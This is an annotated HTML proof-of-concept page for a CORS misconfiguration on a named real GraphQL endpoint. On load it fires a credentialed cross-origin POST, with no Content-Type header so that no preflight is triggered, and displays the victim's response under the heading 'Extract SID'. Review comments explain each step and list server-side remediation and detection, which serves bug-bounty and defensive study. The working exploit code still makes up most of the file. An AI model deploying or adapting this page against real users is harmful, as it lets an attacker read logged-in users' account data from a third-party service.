- <!DOCTYPE html>
<!--
  Proof-of-concept page for a suspected CORS misconfiguration on a GraphQL endpoint.
  On load it sends a credentialed cross-origin POST and shows the response body in an alert dialog.
  NOTE(review): a browser lets this page read the response only if the endpoint answers with
  Access-Control-Allow-Origin equal to this page's origin together with
  Access-Control-Allow-Credentials: true. Nothing in this file shows that it does; confirm from the
  response headers.
  Remediation on the server side: compare Origin against a fixed allowlist instead of reflecting it,
  do not combine credentials with a reflected or "null" origin, send Vary: Origin, set SameSite on
  session cookies, and accept only application/json request bodies.
  Detection: credentialed requests to the endpoint whose Origin header is not a first-party origin.
-->
- <html>
- <head>
- <script>
// cors(): issues the cross-origin request and reports the response body.
// Takes no arguments and returns nothing; it is called from <body onload> and from the button.
- function cors() {
- var xhttp = new XMLHttpRequest();
// Handler acts only when the request is complete (readyState 4) and the status is 200.
- xhttp.onreadystatechange = function() {
- if (this.readyState == 4 && this.status == 200) {
// alert() displays the response text and returns undefined, so this assignment replaces the
// contents of #demo (including the button inside it) with the string "undefined".
// innerHTML is also an HTML-parsing sink; textContent is the safe choice for displaying response data.
- document.getElementById("demo").innerHTML = alert(this.responseText);
- }
- };
// Third argument false makes the request synchronous: send() blocks until the response arrives.
// Synchronous XHR on the main thread is deprecated.
- xhttp.open("POST", "https://graphql.acorns.com/graphql", false);
// withCredentials = true asks the browser to attach the user's cookies for the target origin.
- xhttp.withCredentials = true;
// Body is a JSON array batching two persisted queries (ReferralAgreement, IsAuthenticated),
// each identified by a sha256 hash; no query text is sent.
// No Content-Type header is set, so the string body goes out as text/plain, which does not
// trigger a CORS preflight. An endpoint that accepts only application/json forces a preflight
// for cross-origin callers.
- xhttp.send(JSON.stringify([{"operationName":"ReferralAgreement","variables":{},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"9aa5eea00b7233edd06804ab161d5b3f99817b71ed255013384e004f0a90afc0"}}},{"operationName":"IsAuthenticated","variables":{},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"b62979ec74c2334ebed089531504a59c7654e007185d3e4b22e327d34a64263d"}}}]));
- }</script></head>
<!-- onload runs cors() as soon as the page loads, with no click; the button calls the same function again. -->
- <body onload="cors()">
<!-- <center> is deprecated and is never closed in this file. -->
- <center>
- <h2>CORS POC Exploit armaan </h2>
<!--
  NOTE(review): "SID" presumably means a session identifier. The operations sent are
  ReferralAgreement and IsAuthenticated, and nothing in this file shows what the response contains.
-->
- <h3>Extract SID</h3><div id="demo">
- <button type="button" onclick="cors()">Exploit</button></div></body></html>